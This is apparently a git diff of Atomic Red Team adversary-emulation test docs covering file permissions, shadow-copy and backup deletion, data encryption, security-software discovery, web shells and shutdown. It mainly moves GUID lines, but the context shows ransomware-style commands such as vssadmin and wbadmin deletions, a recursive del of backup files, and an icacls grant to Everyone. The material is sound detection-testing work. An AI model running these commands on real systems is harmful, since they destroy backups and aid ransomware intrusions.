## Atomic Test #1 - WINWORD Remote Template Injection - -auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d - Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** 1489e08a-82c7-44ee-b769-51b72d03521d + + + #### Inputs: diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 3091fc0d..bbef7697 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -22,14 +22,16 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as
## Atomic Test #1 - Take ownership using takeown utility - -auto_generated_guid: 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 - Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it. + **Supported Platforms:** Windows +**auto_generated_guid:** 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 + + + #### Inputs: @@ -68,15 +70,17 @@ echo T1222.001_takeown2 >> #{file_folder_to_own}\T1222.001_takeown2.txt
## Atomic Test #2 - cacls - Grant permission to specified user or group recursively - -auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 - Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a8206bcc-f282-40a9-a389-05d9c0263485 + + + #### Inputs: @@ -116,14 +120,16 @@ echo T1222.001_cacls2 >> #{file_or_folder}\T1222.001_cacls2.txt
## Atomic Test #3 - attrib - Remove read-only attribute - -auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 - Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty. + **Supported Platforms:** Windows +**auto_generated_guid:** bec1e95c-83aa-492e-ab77-60c71bbd21b0 + + + #### Inputs: @@ -164,14 +170,16 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #4 - attrib - hide file - -auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c - Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. + **Supported Platforms:** Windows +**auto_generated_guid:** 32b979da-7b68-42c9-9a99-0e39900fc36c + + + #### Inputs: @@ -218,16 +226,18 @@ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style - -auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 - Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls "C:\*" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\*" if you prefer. + **Supported Platforms:** Windows +**auto_generated_guid:** ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 + + + #### Inputs: diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index d433f301..7d70fc6e 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -30,13 +30,15 @@ Adversarial may use these commands to make themselves the owner of files and dir
## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) - -auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 - Changes a file or folder's permissions using chmod and a specified numeric mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135 + + + #### Inputs: @@ -62,13 +64,15 @@ chmod #{numeric_mode} #{file_or_folder}
## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) - -auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 - Changes a file or folder's permissions using chmod and a specified symbolic mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3 + + + #### Inputs: @@ -94,13 +98,15 @@ chmod #{symbolic_mode} #{file_or_folder}
## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively - -auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 - Changes a file or folder's permissions recursively using chmod and a specified numeric mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4 + + + #### Inputs: @@ -126,13 +132,15 @@ chmod #{numeric_mode} #{file_or_folder} -R
## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively - -auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f - Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f + + + #### Inputs: @@ -158,13 +166,15 @@ chmod #{symbolic_mode} #{file_or_folder} -R
## Atomic Test #5 - chown - Change file or folder ownership and group - -auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 - Changes a file or folder's ownership and group information using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** d169e71b-85f9-44ec-8343-27093ff3dfc0 + + + #### Inputs: @@ -191,13 +201,15 @@ chown #{owner}:#{group} #{file_or_folder}
## Atomic Test #6 - chown - Change file or folder ownership and group recursively - -auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 - Changes a file or folder's ownership and group information recursively using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** b78598be-ff39-448f-a463-adbf2a5b7848 + + + #### Inputs: @@ -224,13 +236,15 @@ chown #{owner}:#{group} #{file_or_folder} -R
## Atomic Test #7 - chown - Change file or folder mode ownership only - -auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 - Changes a file or folder's ownership only using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99 + + + #### Inputs: @@ -256,13 +270,15 @@ chown #{owner} #{file_or_folder}
## Atomic Test #8 - chown - Change file or folder ownership recursively - -auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 - Changes a file or folder's ownership only recursively using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 + + + #### Inputs: @@ -288,14 +304,16 @@ chown #{owner} #{file_or_folder} -R
## Atomic Test #9 - chattr - Remove immutable file attribute - -auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f - Remove's a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** e7469fe2-ad41-4382-8965-99b94dd3c13f + + + #### Inputs: diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index 3d3deafa..9eac5248 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -18,14 +18,16 @@
## Atomic Test #1 - Windows - Discover domain trusts with dsquery - -auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f - Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role. + **Supported Platforms:** Windows +**auto_generated_guid:** 4700a710-c821-4e17-a3ec-9e4c81d6845f + + + @@ -45,15 +47,17 @@ dsquery * -filter "(objectClass=trustedDomain)" -attr *
## Atomic Test #2 - Windows - Discover domain trusts with nltest - -auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe - Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family. + **Supported Platforms:** Windows +**auto_generated_guid:** 2e22641d-0498-48d2-b9ff-c71e496ccdbe + + + @@ -85,14 +89,16 @@ echo Sorry RSAT must be installed manually
## Atomic Test #3 - Powershell enumerate domains and forests - -auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 - Use powershell to enumerate AD information. Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role. + **Supported Platforms:** Windows +**auto_generated_guid:** c58fbc62-8a62-489e-8f2d-3565d7d96f30 + + + @@ -137,14 +143,16 @@ Write-Host "Sorry RSAT must be installed manually"
## Atomic Test #4 - Adfind - Enumerate Active Directory OUs - -auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec + + + #### Inputs: @@ -181,14 +189,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #5 - Adfind - Enumerate Active Directory Trusts - -auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 15fe436d-e771-4ff3-b655-2dca9ba52834 + + + #### Inputs: diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 32873bd4..cdb01b5b 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -18,14 +18,16 @@ In cloud environments, adversaries may leverage access to delete cloud storage,
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete - -auto_generated_guid: 476419b5-aebf-4366-a131-ae3e8dae5fc2 - Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in the powershell session along with other information about the file that was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 476419b5-aebf-4366-a131-ae3e8dae5fc2 + + + #### Inputs: @@ -66,14 +68,16 @@ Remove-Item $env:TEMP\SDelete.zip -Force
## Atomic Test #2 - macOS/Linux - Overwrite file with DD - -auto_generated_guid: 38deee99-fd65-4031-bec8-bfa4f9f26146 - Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146 + + + #### Inputs: diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index bad8ac5a..293063cb 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -20,13 +20,15 @@ In cloud environments, storage objects within compromised accounts may also be e
## Atomic Test #1 - Encrypt files using gpg (Linux) - -auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 - Uses gpg to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765 + + + #### Inputs: @@ -70,13 +72,15 @@ which_gpg=`which gpg`
## Atomic Test #2 - Encrypt files using 7z (Linux) - -auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad - Uses 7z to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad + + + #### Inputs: @@ -120,13 +124,15 @@ which_7z=`which 7z`
## Atomic Test #3 - Encrypt files using ccrypt (Linux) - -auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f - Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. + **Supported Platforms:** Linux +**auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f + + + #### Inputs: @@ -172,13 +178,15 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
## Atomic Test #4 - Encrypt files using openssl (Linux) - -auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 - Uses openssl to encrypt a file + **Supported Platforms:** Linux +**auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1 + + + #### Inputs: diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index 4658beaa..a220070f 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -16,15 +16,17 @@ Adversaries may accomplish this by disabling individual services of high importa
## Atomic Test #1 - Windows - Stop service using Service Controller - -auto_generated_guid: 21dfb440-830d-4c86-a3e5-2a491d5a8d04 - Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** 21dfb440-830d-4c86-a3e5-2a491d5a8d04 + + + #### Inputs: @@ -53,15 +55,17 @@ sc.exe start #{service_name} >nul 2>&1
## Atomic Test #2 - Windows - Stop service using net.exe - -auto_generated_guid: 41274289-ec9c-4213-bea4-e43c4aa57954 - Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully." will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** 41274289-ec9c-4213-bea4-e43c4aa57954 + + + #### Inputs: @@ -90,16 +94,18 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #3 - Windows - Stop service by killing process - -auto_generated_guid: f3191b84-c38b-400b-867e-3a217a27795f - Stops a specified service killng the service's process. This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated." will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be started by running the cleanup command. + **Supported Platforms:** Windows +**auto_generated_guid:** f3191b84-c38b-400b-867e-3a217a27795f + + + #### Inputs: diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index c239f5bc..ad1339ef 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -29,18 +29,20 @@ A number of native Windows utilities have been used by adversaries to disable or
## Atomic Test #1 - Windows - Delete Volume Shadow Copies - -auto_generated_guid: 43819286-91a9-4369-90ed-d31fb4da2c01 - Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11) + **Supported Platforms:** Windows +**auto_generated_guid:** 43819286-91a9-4369-90ed-d31fb4da2c01 + + + @@ -72,14 +74,16 @@ vssadmin.exe create shadow /for=c:
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI - -auto_generated_guid: 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 - Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Shadow copies can only be created on Windows server or Windows 8. + **Supported Platforms:** Windows +**auto_generated_guid:** 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 + + + @@ -99,14 +103,16 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog - -auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c - Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session. + **Supported Platforms:** Windows +**auto_generated_guid:** 263ba6cb-ea2b-41c9-9d4e-b652dadd002c + + + @@ -126,14 +132,16 @@ wbadmin delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair - -auto_generated_guid: cf21060a-80b3-4238-a595-22525de4ab81 - Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the powershell session. + **Supported Platforms:** Windows +**auto_generated_guid:** cf21060a-80b3-4238-a595-22525de4ab81 + + + @@ -159,16 +167,18 @@ bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell - -auto_generated_guid: 39a295ca-7059-4a88-86f6-09556c1211e7 - Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil. Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution there may be no output displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 39a295ca-7059-4a88-86f6-09556c1211e7 + + + @@ -188,14 +198,16 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
## Atomic Test #6 - Windows - Delete Backup Files - -auto_generated_guid: 6b1dbaf6-cc8a-4ea6-891f-6058569653bf - Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try to delete files from around the system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b1dbaf6-cc8a-4ea6-891f-6058569653bf + + + @@ -215,13 +227,15 @@ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\back
## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup - -auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 - Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. + **Supported Platforms:** Windows +**auto_generated_guid:** 584331dd-75bc-4c02-9e0b-17f5fd81c748 + + + diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md index 83a87102..805913fa 100644 --- a/atomics/T1491.001/T1491.001.md +++ b/atomics/T1491.001/T1491.001.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Replace Desktop Wallpaper - -auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 - Downloads an image from a URL and sets it as the desktop wallpaper. + **Supported Platforms:** Windows +**auto_generated_guid:** 30558d53-9d76-41c4-9267-a7bd5184bed3 + + + #### Inputs: diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 714d567e..23067507 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -14,14 +14,16 @@ Additionally, some cryptocurrency mining malware kills off processes for competi
## Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes - -auto_generated_guid: 904a5a0e-fb02-490d-9f8d-0e256eb37549 - This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549 + + + diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 86ae11ca..f7cf9555 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -22,14 +22,16 @@ Hardware checks, such as the presence of the fan, temperature, and audio devices
## Atomic Test #1 - Detect Virtualization Environment (Linux) - -auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840 - systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. + **Supported Platforms:** Linux +**auto_generated_guid:** dfbd1a21-540d-4574-9731-e852bd6fe840 + + + @@ -49,13 +51,15 @@ if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendo
## Atomic Test #2 - Detect Virtualization Environment (Windows) - -auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d - Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine + **Supported Platforms:** Windows +**auto_generated_guid:** 502a7dc4-9d6f-4d28-abf2-f0e84692562d + + + @@ -81,13 +85,15 @@ $error.clear()
## Atomic Test #3 - Detect Virtualization Environment (MacOS) - -auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 - ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. + **Supported Platforms:** macOS +**auto_generated_guid:** a960185f-aef6-4547-8350-d1ce16680d09 + + + diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md index 7e3386e2..e5ad87a3 100644 --- a/atomics/T1505.002/T1505.002.md +++ b/atomics/T1505.002/T1505.002.md @@ -12,14 +12,16 @@ Adversaries may register a malicious transport agent to provide a persistence me
## Atomic Test #1 - Install MS Exchange Transport Agent Persistence - -auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d - Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + **Supported Platforms:** Windows +**auto_generated_guid:** 43e92449-ff60-46e9-83a3-1a38089df94d + + + #### Inputs: diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index 1a3d7bbd..83933c8d 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -12,15 +12,17 @@ In addition to a server-side script, a Web shell may have a client interface pro
## Atomic Test #1 - Web Shell Written to Disk - -auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 - This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx + **Supported Platforms:** Windows +**auto_generated_guid:** 0a2ce662-1efa-496f-a472-2fe7b080db16 + + + #### Inputs: diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 230fdbef..97c326fc 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -24,16 +24,18 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
## Atomic Test #1 - Security Software Discovery - -auto_generated_guid: f92a380f-ced9-491f-b338-95a991418ce2 - Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles and specific security software. + **Supported Platforms:** Windows +**auto_generated_guid:** f92a380f-ced9-491f-b338-95a991418ce2 + + + @@ -58,15 +60,17 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell - -auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0 - Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. + **Supported Platforms:** Windows +**auto_generated_guid:** 7f566051-f033-49fb-89de-b6bacab730f0 + + + @@ -89,14 +93,16 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps (macOS) - -auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840 - Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. + **Supported Platforms:** macOS +**auto_generated_guid:** ba62ce11-e820-485f-9c17-6f3c857cd840 + + + @@ -116,14 +122,16 @@ ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefen
## Atomic Test #4 - Security Software Discovery - ps (Linux) - -auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 - Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. + **Supported Platforms:** Linux +**auto_generated_guid:** 23b91cd2-c99c-4002-9e41-317c63e024a2 + + + @@ -143,15 +151,17 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|
## Atomic Test #5 - Security Software Discovery - Sysmon Service - -auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 - Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. + **Supported Platforms:** Windows +**auto_generated_guid:** fe613cf3-8009-4446-9a0f-bc78a15b66c9 + + + @@ -171,15 +181,17 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #6 - Security Software Discovery - AV Discovery via WMI - -auto_generated_guid: 1553252f-14ea-4d3b-8a08-d7a4211aa945 - Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. + **Supported Platforms:** Windows +**auto_generated_guid:** 1553252f-14ea-4d3b-8a08-d7a4211aa945 + + + diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 3dbb4789..796e4ffc 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -16,14 +16,16 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
## Atomic Test #1 - Find and Display Internet Explorer Browser Version - -auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4 - Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 68981660-6670-47ee-a5fa-7e74806420a4 + + + @@ -43,14 +45,16 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed - -auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b - Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b + + + @@ -71,13 +75,15 @@ Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uni
## Atomic Test #3 - Find and Display Safari Browser Version - -auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f - Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors + **Supported Platforms:** macOS +**auto_generated_guid:** 103d6533-fd2a-4d08-976a-4a598565280f + + + diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 1a223ec8..13cf9b66 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -28,13 +28,15 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
## Atomic Test #1 - Shutdown System - Windows - -auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 - This test shuts down a Windows system. + **Supported Platforms:** Windows +**auto_generated_guid:** ad254fa8-45c0-403b-8c77-e00b3d3e7a64 + + + #### Inputs: @@ -59,13 +61,15 @@ shutdown /s /t #{timeout}
## Atomic Test #2 - Restart System - Windows - -auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 - This test restarts a Windows system. + **Supported Platforms:** Windows +**auto_generated_guid:** f4648f0d-bf78-483c-bafc-3ec99cd1c302 + + + #### Inputs: @@ -90,13 +94,15 @@ shutdown /r /t #{timeout}
## Atomic Test #3 - Restart System via `shutdown` - macOS/Linux - -auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb - This test restarts a macOS/Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb + + + #### Inputs: @@ -121,13 +127,15 @@ shutdown -r #{timeout}
## Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux - -auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de - This test shuts down a macOS/Linux system using a halt. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de + + + #### Inputs: @@ -152,13 +160,15 @@ shutdown -h #{timeout}
## Atomic Test #5 - Restart System via `reboot` - macOS/Linux - -auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 - This test restarts a macOS/Linux system via `reboot`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027 + + + @@ -178,13 +188,15 @@ reboot
## Atomic Test #6 - Shutdown System via `halt` - Linux - -auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd - This test shuts down a Linux system using `halt`. + **Supported Platforms:** Linux +**auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd + + + @@ -204,13 +216,15 @@ halt -p
## Atomic Test #7 - Reboot System via `halt` - Linux - -auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e - This test restarts a Linux system using `halt`. + **Supported Platforms:** Linux +**auto_generated_guid:** 78f92e14-f1e9-4446-b3e9-f1b921f2459e + + + @@ -230,13 +244,15 @@ halt --reboot
## Atomic Test #8 - Shutdown System via `poweroff` - Linux - -auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa - This test shuts down a Linux system using `poweroff`. + **Supported Platforms:** Linux +**auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa + + + @@ -256,13 +272,15 @@ poweroff
